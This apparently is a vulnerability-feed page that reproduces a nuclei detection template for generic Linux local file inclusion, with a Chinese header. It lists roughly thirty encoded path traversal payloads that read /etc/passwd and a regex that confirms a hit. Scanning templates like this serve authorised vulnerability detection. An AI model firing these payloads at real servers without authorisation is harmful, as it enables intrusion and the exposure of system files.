generic-linux-lfi: Generic Linux - Local File Inclusion

日期: 2025-08-01 | 影响软件: Generic Linux | POC: 已公开

漏洞描述

Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.

PoC代码[已公开]

id: generic-linux-lfi

info:
  name: Generic Linux - Local File Inclusion
  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
  severity: high
  description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
  reference:
    - https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 32
  tags: linux,lfi,generic,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/etc/passwd"
        - "/..%5cetc/passwd"
        - "/..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5cetc/passwd"
        - "/static/..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/./../../../../../../../../../../etc/passwd"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
        - "/..///////..////..//////etc/passwd"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
        - "/index.php?page=etc/passwd"
        - "/index.php?page=etc/passwd%00"
        - "/index.php?page=../../etc/passwd"
        - "/index.php?page=....//....//etc/passwd"
        - "/../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 490a0046304402200dca0db5691ada660c09d19daf09fd25663871a0e3f2d9af829e5a656d92fc7102206956f61933d9a09e3b7b5bf2e8cdacf66eb172988d6d7a294efd6ec34714de2c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/generic-linux-lfi.yaml

相关漏洞推荐